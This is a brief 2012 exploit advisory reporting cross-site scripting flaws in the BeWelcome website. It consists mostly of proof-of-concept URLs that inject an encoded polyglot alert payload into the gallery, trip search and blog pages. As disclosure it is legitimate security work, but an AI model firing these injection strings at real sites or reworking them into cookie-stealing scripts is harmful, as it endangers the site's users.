BeWelcome Cross Site Scripting

# Exploit Title: BeWelcome Cross Site Scripting
# Date: 10.02.2012
# Author: Sony
# Software Link: http://www.bewelcome.org
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bw-rox-cross-site-scripting.html
..................................................................

About BeWelcome:

http://bw.guaka.org/
http://redmine.bewelcome.org/projects/bw-drupal
http://trac.bewelcome.org/

Well, we have a Multiple Cross Site Scripting Vulnerabilities.

Demo:

in the gallery:

http://www.bewelcome.org/gallery/show/user/sony/images/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

In the group:

in the search "trips":

http://www.bewelcome.org/trip/search?s=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Search+trips

in the blogs:

http://www.bewelcome.org/blog/cat%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

in the "send invite":

I think in the profile too.

Etc..